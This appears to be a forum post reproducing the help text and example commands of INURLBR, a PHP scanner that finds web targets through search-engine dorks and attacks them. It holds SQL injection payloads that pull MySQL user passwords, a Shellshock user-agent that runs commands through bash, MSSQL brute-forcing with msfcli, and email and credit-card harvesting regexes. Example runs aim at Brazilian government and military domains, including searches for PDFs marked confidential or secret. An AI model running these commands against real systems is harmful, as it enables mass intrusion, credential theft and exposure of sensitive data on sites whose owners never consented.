SCANNER - INURLBR
Advanced search in search engines,
Allows the analysis provided to exploit GET / POST capture emails & urls,
With an internal custom validation junction for each target / url found.
Code:
[align=center] +-----------------------------------------------------------------------------+[/align]
[align=center] | [!] Legal disclaimer: Usage of INURLBR for attacking targets without prior |[/align]
[align=center] | mutual consent is illegal. |[/align]
[align=center] | It is the end user's responsibility to obey all applicable local, state and|[/align]
[align=center] | federal laws. |[/align]
[align=center] | Developers assume no liability and are not responsible for any misuse or |[/align]
[align=center] | damage caused by this program |[/align]
[align=center] +-----------------------------------------------------------------------------+[/align]
Code:
[align=center] ----------------------------------------------------------[/align]
[align=center]PHP Version 5.4.7[/align]
[align=center]php5-curl LIB[/align]
[align=center]php5-cli LIB [/align]
[align=center]cURL support enabled[/align]
[align=center]cURL Information 7.24.0[/align]
[align=center]allow_url_fopen On[/align]
[align=center]permission Reading & Writing[/align]
[align=center]User root privilege, or is in the sudoers group[/align]
[align=center]Operating system LINUX[/align]
[align=center]Proxy random TOR [/align]
[align=center] ----------------------------------------------------------[/align]
[align=center][+] PERMISSION EXECUTION: chmod +x inurlbr.php[/align]
[align=center][+] INSTALLING LIB CURL: sudo apt-get install php5-curl[/align]
[align=center][+] INSTALLING LIB CLI: sudo apt-get install php5-cli[/align]
[align=center][+] INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en[/align]
[align=center] ----------------------------------------------------------[/align]
[align=center]resume: apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl[/align]
Code:
[align=center]-h[/align]
[align=center]--help Alternative long length help command.[/align]
[align=center]--ajuda Command to specify Help.[/align]
[align=center]--info Information script.[/align]
[align=center]--update Code update. [/align]
[align=center]-q Choose which search engine you want through [1...24] / [e1..6]]:[/align]
[align=center] [options]:[/align]
[align=center] 1 - GOOGLE / (CSE) GENERIC RANDOM / API[/align]
[align=center] 2 - BING[/align]
[align=center] 3 - YAHOO BR[/align]
[align=center] 4 - ASK[/align]
[align=center] 5 - HAO123 BR[/align]
[align=center] 6 - GOOGLE (API)[/align]
[align=center] 7 - LYCOS[/align]
[align=center] 8 - UOL BR[/align]
[align=center] 9 - YAHOO US[/align]
[align=center] 10 - SAPO[/align]
[align=center] 11 - DMOZ[/align]
[align=center] 12 - GIGABLAST[/align]
[align=center] 13 - NEVER[/align]
[align=center] 14 - BAIDU BR[/align]
[align=center] 15 - YANDEX[/align]
[align=center] 16 - ZOO[/align]
[align=center] 17 - HOTBOT[/align]
[align=center] 18 - ZHONGSOU[/align]
[align=center] 19 - HKSEARCH[/align]
[align=center] 20 - EZILION[/align]
[align=center] 21 - SOGOU[/align]
[align=center] 22 - DUCK DUCK GO[/align]
[align=center] 23 - BOOROW[/align]
[align=center] 24 - GOOGLE(CSE) GENERIC RANDOM[/align]
[align=center] ----------------------------------------[/align]
[align=center] SPECIAL MOTORS[/align]
[align=center] ----------------------------------------[/align]
[align=center] e1 - TOR FIND[/align]
[align=center] e2 - ELEPHANT[/align]
[align=center] e3 - TORSEARCH[/align]
[align=center] e4 - WIKILEAKS[/align]
[align=center] e5 - OTN[/align]
[align=center] e6 - EXPLOITS SHODAN[/align]
[align=center] ----------------------------------------[/align]
[align=center] all - All search engines / not special motors[/align]
[align=center] Default: 1[/align]
[align=center] Example: -q {op}[/align]
[align=center] Usage: -q 1[/align]
[align=center] -q 5[/align]
[align=center] Using more than one engine: -q 1,2,5,6,11,24[/align]
[align=center] Using all engines: -q all[/align]
[align=center][/align]
[align=center] --proxy Choose which proxy you want to use through the search engine:[/align]
[align=center] Example: --proxy {proxy:port}[/align]
[align=center] Usage: --proxy localhost:8118[/align]
[align=center] --proxy socks5://googleinurl@localhost:9050[/align]
[align=center] --proxy http://admin:[email protected]:8080[/align]
[align=center][/align]
[align=center] --proxy-file Set font file to randomize your proxy to each search engine.[/align]
[align=center] Example: --proxy-file {proxys}[/align]
[align=center] Usage: --proxy-file proxys_list.txt[/align]
[align=center][/align]
[align=center] --time-proxy Set the time how often the proxy will be exchanged.[/align]
[align=center] Example: --time-proxy {second}[/align]
[align=center] Usage: --time-proxy 10[/align]
[align=center][/align]
[align=center] --proxy-http-file Set file with urls http proxy, [/align]
[align=center] are used to bular capch search engines[/align]
[align=center] Example: --proxy-http-file {youfilehttp}[/align]
[align=center] Usage: --proxy-http-file http_proxys.txt[/align]
[align=center][/align]
[align=center][/align]
[align=center] --tor-random Enables the TOR function, each usage links an unique IP.[/align]
[align=center][/align]
[align=center] -t Choose the validation type: op 1, 2, 3, 4, 5[/align]
[align=center] [options]:[/align]
[align=center] 1 - The first type uses default errors considering the script:[/align]
[align=center] It establishes connection with the exploit through the get method.[/align]
[align=center] Demo: www.alvo.com.br/pasta/index.php?id={exploit}[/align]
[align=center][/align]
[align=center] 2 - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'[/align]
[align=center] It also establishes connection with the exploit through the get method[/align]
[align=center] Demo: www.alvo.com.br/pasta/index.php?id={exploit}[/align]
[align=center][/align]
[align=center] 3 - The third type combine both first and second types:[/align]
[align=center] Then, of course, it also establishes connection with the exploit through the get method[/align]
[align=center] Demo: www.target.com.br{exploit}[/align]
[align=center] Default: 1[/align]
[align=center] Example: -t {op}[/align]
[align=center] Usage: -t 1[/align]
[align=center][/align]
[align=center] 4 - The fourth type a validation based on source file and will be enabled scanner standard functions.[/align]
[align=center] The source file their values are concatenated with target url.[/align]
[align=center] - Set your target with command --target {http://target}[/align]
[align=center] - Set your file with command -o {file}[/align]
[align=center] Explicative:[/align]
[align=center] Source file values:[/align]
[align=center] /admin/index.php?id=[/align]
[align=center] /pag/index.php?id=[/align]
[align=center] /brazil.php?new=[/align]
[align=center] Demo: [/align]
[align=center] www.target.com.br/admin/index.php?id={exploit}[/align]
[align=center] www.target.com.br/pag/index.php?id={exploit}[/align]
[align=center] www.target.com.br/brazil.php?new={exploit}[/align]
[align=center][/align]
[align=center] 5 - (FIND PAGE) The fifth type of validation based on the source file,[/align]
[align=center] Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.[/align]
[align=center] - Set your target with command --target {http://target}[/align]
[align=center] - Set your file with command -o {file}[/align]
[align=center] Explicative:[/align]
[align=center] Source file values:[/align]
[align=center] /admin/admin.php[/align]
[align=center] /admin.asp[/align]
[align=center] /admin.aspx[/align]
[align=center] Demo: [/align]
[align=center] www.target.com.br/admin/admin.php[/align]
[align=center] www.target.com.br/admin.asp[/align]
[align=center] www.target.com.br/admin.aspx[/align]
[align=center] Observation: If it shows the code 200 will be separated in the output file[/align]
[align=center][/align]
[align=center] DEFAULT ERRORS: [/align]
[align=center][/align]
[align=center] [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK, [/align][*]
[align=center] [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,[/align][*]
[align=center] [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,[/align][*]
[align=center] [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,[/align][*]
[align=center] [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA, [/align][*]
[align=center] [*]ERROR INDEFINITE[/align][*]
[align=center][/align]
[align=center][/align]
[align=center] --dork Defines which dork the search engine will use.[/align]
[align=center] Example: --dork {dork}[/align]
[align=center] Usage: --dork 'site:.gov.br inurl:php? id'[/align]
[align=center] - Using multiples dorks:[/align]
[align=center] Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}[/align]
[align=center] Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'[/align]
[align=center][/align]
[align=center] --dork-file Set font file with your search dorks.[/align]
[align=center] Example: --dork-file {dork_file}[/align]
[align=center] Usage: --dork-file 'dorks.txt'[/align]
[align=center][/align]
[align=center] --exploit-get Defines which exploit will be injected through the GET method to each URL found.[/align]
[align=center] Example: --exploit-get {exploit_get}[/align]
[align=center] Usage: --exploit-get "?'´%270x27;"[/align]
[align=center][/align]
[align=center] --exploit-post Defines which exploit will be injected through the POST method to each URL found.[/align]
[align=center] Example: --exploit-post {exploit_post}[/align]
[align=center] Usage: --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'[/align]
[align=center][/align]
[align=center] --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all. [/align]
[align=center] The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_ [/align]
[align=center] Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'[/align]
[align=center] _TARGET_ is the specified URL/TARGET obtained by the process[/align]
[align=center] _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.[/align]
[align=center] Example: --exploit-command {exploit-command}[/align]
[align=center] Usage: --exploit-command '/admin/config.conf' [/align]
[align=center][/align]
[align=center] -a Specify the string that will be used on the search script:[/align]
[align=center] Example: -a {string}[/align]
[align=center] Usage: -a '<title>hello world</title>'[/align]
[align=center][/align]
[align=center] -d Specify the script usage op 1, 2, 3, 4, 5.[/align]
[align=center] Example: -d {op}[/align]
[align=center] Usage: -d 1 /URL of the search engine.[/align]
[align=center] -d 2 /Show all the url.[/align]
[align=center] -d 3 /Detailed request of every URL.[/align]
[align=center] -d 4 /Shows the HTML of every URL.[/align]
[align=center] -d 5 /Detailed request of all URLs.[/align]
[align=center] -d 6 /Detailed PING - PONG irc. [/align]
[align=center][/align]
[align=center] -s Specify the output file where it will be saved the vulnerable URLs.[/align]
[align=center][/align]
[align=center] Example: -s {file}[/align]
[align=center] Usage: -s your_file.txt[/align]
[align=center][/align]
[align=center] -o Manually manage the vulnerable URLs you want to use from a file, without using a search engine.[/align]
[align=center] Example: -o {file_where_my_urls_are}[/align]
[align=center] Usage: -o tests.txt[/align]
[align=center][/align]
[align=center] --persist Attempts when Google blocks your search.[/align]
[align=center] The script tries to another google host / default = 4[/align]
[align=center] Example: --persist {number_attempts}[/align]
[align=center] Usage: --persist 7[/align]
[align=center][/align]
[align=center] --ifredirect Return validation method post REDIRECT_URL[/align]
[align=center] Example: --ifredirect {string_validation}[/align]
[align=center] Usage: --ifredirect '/admin/painel.php'[/align]
[align=center][/align]
[align=center] -m Enable the search for emails on the urls specified.[/align]
[align=center][/align]
[align=center] -u Enables the search for URL lists on the url specified.[/align]
[align=center][/align]
[align=center] --gc Enable validation of values with google webcache.[/align]
[align=center][/align]
[align=center] --pr Progressive scan, used to set operators (dorks), [/align]
[align=center] makes the search of a dork and valid results, then goes a dork at a time.[/align]
[align=center][/align]
[align=center] --file-cookie Open cookie file.[/align]
[align=center][/align]
[align=center] --save-as Save results in a certain place.[/align]
[align=center][/align]
[align=center] --shellshock Explore shellshock vulnerability by setting a malicious user-agent.[/align]
[align=center][/align]
[align=center] --popup Run --command all or vuln in a parallel terminal.[/align]
[align=center][/align]
[align=center] --cms-check Enable simple check if the url / target is using CMS.[/align]
[align=center][/align]
[align=center] --no-banner Remove the script presentation banner.[/align]
[align=center][/align]
[align=center] --unique Filter results in unique domains.[/align]
[align=center][/align]
[align=center] --beep Beep sound when a vulnerability is found.[/align]
[align=center][/align]
[align=center] --alexa-rank Show alexa positioning in the results.[/align]
[align=center][/align]
[align=center] --robots Show values file robots.[/align]
[align=center][/align]
[align=center] --range Set range IP.[/align]
[align=center] Example: --range {range_start,rage_end}[/align]
[align=center] Usage: --range '172.16.0.5#172.16.0.255'[/align]
[align=center][/align]
[align=center] --range-rand Set amount of random ips.[/align]
[align=center] Example: --range-rand {rand}[/align]
[align=center] Usage: --range-rand '50'[/align]
[align=center][/align]
[align=center] --irc Sending vulnerable to IRC / server channel.[/align]
[align=center] Example: --irc {server#channel}[/align]
[align=center] Usage: --irc 'irc.rizon.net#inurlbrasil'[/align]
[align=center][/align]
[align=center] --http-header Set HTTP header.[/align]
[align=center] Example: --http-header {youemail}[/align]
[align=center] Usage: --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'[/align]
[align=center][/align]
[align=center] --sedmail Sending vulnerable to email.[/align]
[align=center] Example: --sedmail {youemail}[/align]
[align=center] Usage: --sedmail [email protected][/align]
[align=center][/align]
[align=center] --delay Delay between research processes.[/align]
[align=center] Example: --delay {second}[/align]
[align=center] Usage: --delay 10[/align]
[align=center][/align]
[align=center] --time-out Timeout to exit the process.[/align]
[align=center] Example: --time-out {second}[/align]
[align=center] Usage: --time-out 10[/align]
[align=center][/align]
[align=center] --ifurl Filter URLs based on their argument.[/align]
[align=center] Example: --ifurl {ifurl}[/align]
[align=center] Usage: --ifurl index.php?id=[/align]
[align=center][/align]
[align=center] --ifcode Valid results based on your return http code.[/align]
[align=center] Example: --ifcode {ifcode}[/align]
[align=center] Usage: --ifcode 200[/align]
[align=center][/align]
[align=center] --ifemail Filter E-mails based on their argument.[/align]
[align=center] Example: --ifemail {file_where_my_emails_are}[/align]
[align=center] Usage: --ifemail sp.gov.br[/align]
[align=center][/align]
[align=center] --url-reference Define referring URL in the request to send him against the target.[/align]
[align=center] Example: --url-reference {url}[/align]
[align=center] Usage: --url-reference http://target.com/admin/user/valid.php[/align]
[align=center][/align]
[align=center] --mp Limits the number of pages in the search engines.[/align]
[align=center] Example: --mp {limit}[/align]
[align=center] Usage: --mp 50[/align]
[align=center][/align]
[align=center] --user-agent Define the user agent used in its request against the target.[/align]
[align=center] Example: --user-agent {agent}[/align]
[align=center] Usage: --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'[/align]
[align=center] Usage-exploit / SHELLSHOCK: [/align]
[align=center] --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'[/align]
[align=center] Complete command: [/align]
[align=center] php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'[/align]
[align=center][/align]
[align=center] --sall Saves all urls found by the scanner.[/align]
[align=center] Example: --sall {file}[/align]
[align=center] Usage: --sall your_file.txt[/align]
[align=center][/align]
[align=center] --command-vul Every vulnerable URL found will execute this command parameters.[/align]
[align=center] Example: --command-vul {command}[/align]
[align=center] Usage: --command-vul 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center] --command-vul './exploit.sh _TARGET_ output.txt'[/align]
[align=center] --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center][/align]
[align=center] --command-all Use this commmand to specify a single command to EVERY URL found.[/align]
[align=center] Example: --command-all {command}[/align]
[align=center] Usage: --command-all 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center] --command-all './exploit.sh _TARGET_ output.txt'[/align]
[align=center] --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center] [!] Observation:[/align]
[align=center][/align]
[align=center] _TARGET_ will be replaced by the URL/target found, although if the user [/align]
[align=center] doesn't input the get, only the domain will be executed.[/align]
[align=center][/align]
[align=center] _TARGETFULL_ will be replaced by the original URL / target found.[/align]
[align=center][/align]
[align=center] _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.[/align]
[align=center][/align]
[align=center] _TARGETIP_ return of ip URL / target found.[/align]
[align=center][/align]
[align=center] _URI_ Back URL set of folders / target found.[/align]
[align=center][/align]
[align=center] _RANDOM_ Random strings.[/align]
[align=center][/align]
[align=center] _PORT_ Capture port of the current test, within the --port-scan process.[/align]
[align=center][/align]
[align=center] _EXPLOIT_ will be replaced by the specified command argument --exploit-command.[/align]
[align=center] The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_[/align]
[align=center][/align]
[align=center] --replace Replace values in the target URL.[/align]
[align=center] Example: --replace {value_old[INURL]value_new}[/align]
[align=center] Usage: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'[/align]
[align=center] --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'[/align]
[align=center] --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'[/align]
[align=center][/align]
[align=center] --remove Remove values in the target URL.[/align]
[align=center] Example: --remove {string}[/align]
[align=center] Usage: --remove '/admin.php?id=0'[/align]
[align=center][/align]
[align=center] --regexp Using regular expression to validate his research, the value of the [/align]
[align=center] Expression will be sought within the target/URL.[/align]
[align=center] Example: --regexp {regular_expression}[/align]
[align=center] All Major Credit Cards:[/align]
[align=center] Usage: --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'[/align]
[align=center][/align]
[align=center] IP Addresses:[/align]
[align=center] Usage: --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'[/align]
[align=center][/align]
[align=center] EMAIL: [/align]
[align=center] Usage: --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'[/align]
[align=center][/align]
[align=center][/align]
[align=center] ---regexp-filter Using regular expression to filter his research, the value of the [/align]
[align=center] Expression will be sought within the target/URL.[/align]
[align=center] Example: ---regexp-filter {regular_expression}[/align]
[align=center] EMAIL: [/align]
[align=center] Usage: ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'[/align]
[align=center][/align]
[align=center][/align]
[align=center] [!] Small commands manager:[/align]
[align=center][/align]
[align=center] --exploit-cad Command register for use within the scanner.[/align]
[align=center] Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}[/align]
[align=center] Example Format: NMAP::nmap -sV _TARGET_[/align]
[align=center] Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt[/align]
[align=center] Usage: --exploit-cad 'NMAP::nmap -sV _TARGET_' [/align]
[align=center] Observation: Each registered command is identified by an id of your array.[/align]
[align=center] Commands are logged in exploits.conf file.[/align]
[align=center][/align]
[align=center] --exploit-all-id Execute commands, exploits based on id of use,[/align]
[align=center] (all) is run for each target found by the engine.[/align]
[align=center] Example: --exploit-all-id {id,id}[/align]
[align=center] Usage: --exploit-all-id 1,2,8,22[/align]
[align=center][/align]
[align=center] --exploit-vul-id Execute commands, exploits based on id of use,[/align]
[align=center] (vull) run command only if the target was considered vulnerable.[/align]
[align=center] Example: --exploit-vul-id {id,id}[/align]
[align=center] Usage: --exploit-vul-id 1,2,8,22[/align]
[align=center][/align]
[align=center] --exploit-list List all entries command in exploits.conf file.[/align]
[align=center][/align]
[align=center][/align]
[align=center] [!] Running subprocesses:[/align]
[align=center][/align]
[align=center] --sub-file Subprocess performs an injection [/align]
[align=center] strings in URLs found by the engine, via GET or POST.[/align]
[align=center] Example: --sub-file {youfile}[/align]
[align=center] Usage: --sub-file exploits_get.txt[/align]
[align=center][/align]
[align=center] --sub-get defines whether the strings coming from [/align]
[align=center] --sub-file will be injected via GET.[/align]
[align=center] Usage: --sub-get[/align]
[align=center][/align]
[align=center] --sub-post defines whether the strings coming from [/align]
[align=center] --sub-file will be injected via POST.[/align]
[align=center] Usage: --sub-get[/align]
[align=center][/align]
[align=center][/align]
[align=center] --sub-cmd-vul Each vulnerable URL found within the sub-process[/align]
[align=center] will execute the parameters of this command.[/align]
[align=center] Example: --sub-cmd-vul {command}[/align]
[align=center] Usage: --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center] --sub-cmd-vul './exploit.sh _TARGET_ output.txt'[/align]
[align=center] --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center][/align]
[align=center] --sub-cmd-all Run command to each target found within the sub-process scope.[/align]
[align=center] Example: --sub-cmd-all {command}[/align]
[align=center] Usage: --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center] --sub-cmd-all './exploit.sh _TARGET_ output.txt'[/align]
[align=center] --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center][/align]
[align=center][/align]
[align=center] --port-scan Defines ports that will be validated as open.[/align]
[align=center] Example: --port-scan {ports}[/align]
[align=center] Usage: --port-scan '22,21,23,3306'[/align]
[align=center][/align]
[align=center] --port-cmd Define command that runs when finding an open door.[/align]
[align=center] Example: --port-cmd {command}[/align]
[align=center] Usage: --port-cmd './xpl _TARGETIP_:_PORT_'[/align]
[align=center] --port-cmd './xpl _TARGETIP_/file.php?sqli=1'[/align]
[align=center][/align]
[align=center] --port-write Send values for door.[/align]
[align=center] Example: --port-write {'value0','value1','value3'}[/align]
[align=center] Usage: --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"[/align]
[align=center][/align]
[align=center][/align]
[align=center][/align]
[align=center] [!] Modifying values used within script parameters:[/align]
[align=center][/align]
[align=center] md5 Encrypt values in md5.[/align]
[align=center] Example: md5({value})[/align]
[align=center] Usage: md5(102030)[/align]
[align=center] Usage: --exploit-get 'user?id=md5(102030)'[/align]
[align=center][/align]
[align=center] base64 Encrypt values in base64.[/align]
[align=center] Example: base64({value})[/align]
[align=center] Usage: base64(102030)[/align]
[align=center] Usage: --exploit-get 'user?id=base64(102030)'[/align]
[align=center][/align]
[align=center] hex Encrypt values in hex.[/align]
[align=center] Example: hex({value})[/align]
[align=center] Usage: hex(102030)[/align]
[align=center] Usage: --exploit-get 'user?id=hex(102030)'[/align]
[align=center][/align]
[align=center] Generate random values.[/align]
[align=center] Example: random({character_counter})[/align]
[align=center] Usage: random(8)[/align]
[align=center] Usage: --exploit-get 'user?id=random(8)'[/align]
COMMANDS SIMPLE:
Code:
[align=center]./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto' [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6 [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6 [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil' [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' [/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4[/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"[/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'[/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5[/align]
[align=center][/align]
[align=center]./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_' [/align]
[align=center][/align]
[align=center]./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_' [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt' [/align]
dell links
:business: